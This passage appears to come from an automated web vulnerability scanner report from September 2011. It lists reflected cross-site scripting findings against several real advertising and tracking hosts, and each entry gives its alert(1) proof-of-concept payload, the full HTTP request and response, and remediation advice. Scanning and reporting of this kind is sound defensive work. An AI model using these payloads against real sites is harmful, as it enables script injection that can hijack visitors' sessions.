Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77df7"-alert(1)-"55e8aaf402d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1 HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=81D38C248A8FC0D3AE4AEA54D3D89A0E; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:07:58 GMT Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt69exsw" };
(function(){var O="3.13.1";var w=( ...[SNIP]...
4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://fw.adsafeprotected.com |
| Path: | /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6da0d"-alert(1)-"9d189a7cf3d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d HTTP/1.1 Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=85A39D4B6E9886329A268FD24420D20D; Path=/ Content-Type: text/html Date: Sat, 17 Sep 2011 01:07:58 GMT Connection: close
<html> <head></head> <body> <script type="text/javascript"><!--
var adsafeVisParams = { mode : "jsi", jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french", adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d", adsafeSep : "?", requrl : "", reqquery : "", debug : "false", allowPhoneHome : "false", phoneHomeDelay : "3000", killPhrases : "", asid : "gt69exl9" };
(function(){var O="3.13.1";var w=(ad ...[SNIP]...
4.114. http://g2.gumgum.com/services/get [callback parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://g2.gumgum.com |
| Path: | /services/get |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64628<script>alert(1)</script>adbac286e48 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /services/get?callback=GUMGUM.startServices64628<script>alert(1)</script>adbac286e48&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1 Host: g2.gumgum.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Type: text/javascript;charset=UTF-8 Date: Sat, 17 Sep 2011 00:53:48 GMT Server: nginx/0.6.35 Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/ Content-Length: 304 Connection: keep-alive
GUMGUM.startServices64628<script>alert(1)</script>adbac286e48({"at":{"mh":200,"sf":true,"mw":200,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantcast":true},"pag":{"pvid":" ...[SNIP]...
4.115. http://ib.adnxs.com/ptj [redir parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ib.adnxs.com |
| Path: | /ptj |
Issue detail
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19be'%3balert(1)//63b277fa96a was submitted in the redir parameter. This input was echoed as a19be';alert(1)//63b277fa96a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1775927586%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F%26u%3Dhttp%3A%2F%2Fwww.tmz.com%2Fa19be'%3balert(1)//63b277fa96a HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; sess=1; uuid2=-1
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE" Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=-17; path=/; expires=Fri, 16-Dec-2011 00:54:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb549359=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb201818=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=ChII2IgDEAoYUSBRKFEwzN_P8wQQzN_P8wQYUA..; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb884=![nC'208WMcbJO=)IE.8$p5s4?enc=AAAAAAAA0D8zMzMzMzPLPwAAAAAAABRAMzMzMzMzyz8AAAAAAADQP8hj40ddzOJZ7__________L73NOAAAAAP7HBwACAgAAHgAAAAMAAACpIQUAiwMBAAEAAABVU0QAVVNEACwB-gAKJwAAzxEBAgUCAQUAAAAAdx2drAAAAAA.&tt_code=2298003&click=http://g.ca.bid.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26redirectURL=&pixel=http://g.ca.bid.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26ex_uid=2_-17%26creativeID=112554%26message=eJwtjDEOwDAIA78SMXcADI7SN0XdOlX9e0HqdD7Z8Agg5zBNRB5D4GU0WrLMSoQxuYhlae5QrAjpZXczXWdbn3kxf0bxuveuyP5PV8P7AXsaFSU-%26managed=false&media_subtypes=1; path=/; expires=Sun, 18-Sep-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ16m@n8l)=m!zsC8%0Q!816usE!>w6Lc1t!<6-c4nLmV#(f3[iRHV@?K@i[?NGU:QTKx<k4Ji.4N$kk1OJY^A'Bdr9u)1l85nIwbM6sex^qF_k7^/suduT>zr!%>zw81Y'8Y7?BMSJYDNCC'Y#an; path=/; expires=Fri, 16-Dec-2011 00:54:36 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 17 Sep 2011 00:54:36 GMT Content-Length: 246
document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=20&Z=300x250&s=2298003&r=1&_salt=1775927586&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/a19be';alert(1)//63b277fa96a"> ...[SNIP]...
4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://ibmwebsphere.tt.omtrdc.net |
| Path: | /m2/ibmwebsphere/mbox/standard |
Issue detail
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 36dcc<script>alert(1)</script>39a607c6ef6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6&mboxId=0&mboxTime=1316203014547&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1 Host: ibmwebsphere.tt.omtrdc.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss Cookie: mboxSession=1316221012167-554408; mboxPC=1316221012167-554408.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:56:52 GMT; Path=/m2/ibmwebsphere Content-Type: text/javascript Content-Length: 216 Date: Fri, 16 Sep 2011 19:56:52 GMT Server: Test & Target
mboxFactories.get('default').get('eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316221012167-554408.19");
4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://imp.fetchback.com |
| Path: | /serve/fb/adtag.js |
Issue detail
The value of the clicktracking request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c993b"-alert(1)-"79e3f04e7ed was submitted in the clicktracking parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed HTTP/1.1 Host: imp.fetchback.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: opt=1
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 00:52:29 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: uid=1_1316220749_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sat, 17 Sep 2011 00:52:29 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 575
document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS ...[SNIP]... 2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"> ...[SNIP]...
4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://imp.fetchback.com |
| Path: | /serve/fb/adtag.js |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5581f"-alert(1)-"11bcd5d0490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1 HTTP/1.1 Host: imp.fetchback.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: opt=1
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 00:52:31 GMT Server: Apache/2.2.3 (Red Hat) Set-Cookie: uid=1_1316220751_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sat, 17 Sep 2011 00:52:31 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 578
document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS ...[SNIP]... DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"> ...[SNIP]...
4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://imp.fetchback.com |
| Path: | /serve/fb/adtag.js |
Issue detail
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95638"-alert(1)-"4bc29a81874 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C HTTP/1.1 Host: imp.fetchback.com Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: opt=1
Response
HTTP/1.1 200 OK Date: Sat, 17 Sep 2011 00:52:27 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: uid=1_1316220747_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Sat, 17 Sep 2011 00:52:27 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 575
document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9 ...[SNIP]...
4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://jcp.org |
| Path: | /en/jsr/all |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284c1"><script>alert(1)</script>451b1e39851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1 HTTP/1.1 Host: jcp.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Date: Fri, 16 Sep 2011 19:57:07 GMT Content-type: text/html;charset=ISO-8859-1 Content-Length: 411049
<!-- ** BEGIN: header.jsp ** //-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head>
...[SNIP]... <input name="uri" value="/en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1" type="hidden"> ...[SNIP]...
4.121. http://js.revsci.net/gateway/gw.js [ali parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://js.revsci.net |
| Path: | /gateway/gw.js |
Issue detail
The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4cb'%3balert(1)//4b86e2820c was submitted in the ali parameter. This input was echoed as ea4cb';alert(1)//4b86e2820c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023ea4cb'%3balert(1)//4b86e2820c&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=optout
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT Cache-Control: max-age=86400, private Expires: Sun, 18 Sep 2011 00:52:48 GMT X-Proc-ms: 2 Content-Type: application/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 00:52:48 GMT Content-Length: 5217
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... ); A10868.DM_addEncToLoc('vid', '27200'); A10868.DM_addEncToLoc('pid', '261950'); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '3329023ea4cb';alert(1)//4b86e2820c'); A10868.DM_addEncToLoc('cid', '10288627'); A10868.DM_addEncToLoc('p', '99'); A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/'); if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
4.122. http://js.revsci.net/gateway/gw.js [cid parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://js.revsci.net |
| Path: | /gateway/gw.js |
Issue detail
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe30b'%3balert(1)//803e9c23130 was submitted in the cid parameter. This input was echoed as fe30b';alert(1)//803e9c23130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627fe30b'%3balert(1)//803e9c23130&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.tmz.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=optout
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT Cache-Control: max-age=86400, private Expires: Sun, 18 Sep 2011 00:52:48 GMT X-Proc-ms: 1 Content-Type: application/javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sat, 17 Sep 2011 00:52:48 GMT Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC) var rsi_now= new Date(); var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da ...[SNIP]... A10868.DM_addEncToLoc('pid', '261950'); A10868.DM_addEncToLoc('pli', '3449146'); A10868.DM_addEncToLoc('sid', '2298003'); A10868.DM_addEncToLoc('ali', '3329023'); A10868.DM_addEncToLoc('cid', '10288627fe30b';alert(1)//803e9c23130'); A10868.DM_addEncToLoc('p', '99'); A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/'); if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
4.123. http://js.revsci.net/gateway/gw.js [clen parameter]
Summary
| Severity: | High |
